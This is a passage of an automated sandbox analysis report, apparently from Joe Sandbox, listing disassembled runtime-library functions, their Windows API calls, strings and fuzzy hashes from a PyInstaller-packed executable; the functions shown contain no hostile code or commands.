                                                                                      • Instruction ID: 40145a9dcc7ae26b6c931567a13f5dbdef37355701136006c814a1a5faf4dccd
                                                                                      • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                      • Instruction Fuzzy Hash: 3441D961A1968281EBB0BB61B4402BAB394FF84BC4F844135DF6DAB7C9DE3DE511C790
                                                                                      Function 00007FF7F3DEB2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB2D7
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB30D
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB33A
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB34B
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB35C
                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB377
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 2506987500-0
                                                                                      • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                      • Instruction ID: c5d781daee3a063b7547994cd98520d5f517218cb54cb10e4bd36e75af17cfe5
                                                                                      • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                      • Instruction Fuzzy Hash: D8113A20E0D64282F7DC73A19642139D9469F447A0FD54734DC7E6EAD6DE6CB48143A2
                                                                                      Function 00007FF7F3DD2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7F3DD1B6A), ref: 00007FF7F3DD295E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                      • API String ID: 2050909247-2962405886
                                                                                      • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                      • Instruction ID: d67a4eee5423aefc265e6fa62ea03babe85d61feead22d1ec5c153e67b4c86d0
                                                                                      • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                      • Instruction Fuzzy Hash: CC312862B1968142E790B7A5B8406E7B295BF887D4F800131FEADAB789DF3CD1468390
                                                                                      Function 00007FF7F3DD2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                      • String ID: Unhandled exception in script
                                                                                      • API String ID: 3081866767-2699770090
                                                                                      • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                      • Instruction ID: 7e6a71673e423b3a4212b38f906b364629daf10781857dc4f7c35500625a236b
                                                                                      • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                      • Instruction Fuzzy Hash: 03319272619A8285EBA4EBB1E8542F9B360FF88784F840135EE5D5BB89DF3CD141C750
                                                                                      Function 00007FF7F3DD2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7F3DD918F,?,00007FF7F3DD3C55), ref: 00007FF7F3DD2BA0
                                                                                      • MessageBoxW.USER32 ref: 00007FF7F3DD2C2A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentMessageProcess
                                                                                      • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                      • API String ID: 1672936522-3797743490
                                                                                      • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                      • Instruction ID: 3055df954e2b3d5bd7d7a290782d4073e45d36552c9a0a8594bc5bb4e2f4d773
                                                                                      • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                      • Instruction Fuzzy Hash: 7421E562709B4182E751ABA4F8807EAB364FB887C0F800135EE9D6B799DF3CD245C790
                                                                                      Function 00007FF7F3DD2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7F3DD1B99), ref: 00007FF7F3DD2760
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                      • API String ID: 2050909247-1591803126
                                                                                      • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                      • Instruction ID: 567157e596f86f5239f0376b56b1dbb57d0e5dc230794ac905fcb71b7fdcb9ab
                                                                                      • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                      • Instruction Fuzzy Hash: 8F21A67261978152E7A0ABA1F8817E6B394EF883C0F800135FE9D67699DF3CD1458790
                                                                                      Function 00007FF7F3DE9A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                      • Instruction ID: 3407cf8a558331a01aeb401f858656d33aa12e054d4b196cec205c9ccbf1a42e
                                                                                      • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                      • Instruction Fuzzy Hash: 49F0C861B0A70681EB94ABA0E48473A9760FF45764F840335C97E5E1E8CF3CD084C3A0
                                                                                      Function 00007FF7F3DF9368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _set_statfp
                                                                                      • String ID:
                                                                                      • API String ID: 1156100317-0
                                                                                      • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                      • Instruction ID: 7bd888f195acad3f54dca21b5bce1121a1b453f0fb4377b6c8e2670ea6b44924
                                                                                      • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                      • Instruction Fuzzy Hash: CF118622D5CA4381F7E831F5E4D1379A090AF5936CF840634EA7E3E6DE8E7C644141A0
                                                                                      Function 00007FF7F3DEB390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB3AF
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB3CE
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB3F6
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB407
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB418
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value
                                                                                      • String ID:
                                                                                      • API String ID: 3702945584-0
                                                                                      • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                      • Instruction ID: ae4ffe7bfd6d462ffd2f109e2f93de5e328a4a68a7ad24208f5a5b099be51442
                                                                                      • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                      • Instruction Fuzzy Hash: B7115E60E0D60241FBDDB3A59542279E9415F447B0FC94334DC7E6EBD6DD2CB48143A2
                                                                                      Function 00007FF7F3DEB224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value
                                                                                      • String ID:
                                                                                      • API String ID: 3702945584-0
                                                                                      • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                      • Instruction ID: 002245d9623c70b61ea1db2552dc84080bafb52522b8f90d0296bb92c23053a7
                                                                                      • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                      • Instruction Fuzzy Hash: 6311F260A0E60741FBEC72A1885227E9A424F85730FC94734D97E6E6C2DD2CB98046F2
                                                                                      Function 00007FF7F3DE5FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: verbose
                                                                                      • API String ID: 3215553584-579935070
                                                                                      • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                      • Instruction ID: b8ec8516d5bbb46c082a30314a0a77c9678a46eff74ed2d735c5d8fc6e07b228
                                                                                      • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                      • Instruction Fuzzy Hash: BA910932A0864641F7A9AEA4D45037DBB91AB40B54FC44331DABD6B3D5DF3CE48583A2
                                                                                      Function 00007FF7F3DEFBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                      • API String ID: 3215553584-1196891531
                                                                                      • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                      • Instruction ID: 6b25ed96f8289da615756aead5ba728e20c659cdf9cf45904e3ff5b9186b8bcb
                                                                                      • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                      • Instruction Fuzzy Hash: 7F81C772D0824285F7ED7EE58140238AEA8AB11B44FD74231D92DBF2C5DB2DF58183A3
                                                                                      Function 00007FF7F3DDD648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                      • String ID: csm
                                                                                      • API String ID: 2395640692-1018135373
                                                                                      • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                      • Instruction ID: 8a6fca9462f787b1f4c90fc79f9509dd796580b23ece198b5d92a7beda42b32f
                                                                                      • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                      • Instruction Fuzzy Hash: 4451B032B196029ADF94AF95D444A38B791FF44B88F908130DA6E5B7C8DF7CE841C7A0
                                                                                      Function 00007FF7F3DDF288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                      • String ID: csm$csm
                                                                                      • API String ID: 3896166516-3733052814
                                                                                      • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                      • Instruction ID: 26244831693c7a0feffde000285c480376d94f467af32b59a649e4efba219b37
                                                                                      • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                      • Instruction Fuzzy Hash: E051A632A0838286DBB4AFA1D044378B7A8FB55B88F954135DA6C5BBC5CF3CE450C791
                                                                                      Function 00007FF7F3DDEED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallEncodePointerTranslator
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 3544855599-2084237596
                                                                                      • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                      • Instruction ID: b1203d908cccfa1e353a21fb3e2e587374a4184a124dc26d885d84b8effe4fdd
                                                                                      • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                      • Instruction Fuzzy Hash: 7F61A432908BC585DBB0AB65E4403AAF7A4FB85784F444235EBAC1B795CF7CD194CB50
                                                                                      Function 00007FF7F3DD7E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNEL32(00000000,?,00007FF7F3DD352C,?,00000000,00007FF7F3DD3F1B), ref: 00007FF7F3DD7F32
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory
                                                                                      • String ID: %.*s$%s%c$\
                                                                                      • API String ID: 4241100979-1685191245
                                                                                      • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                      • Instruction ID: 6e2740a1a2cd88549ffabce37b722be6d868710c6b2f61816188a2c2771d0717
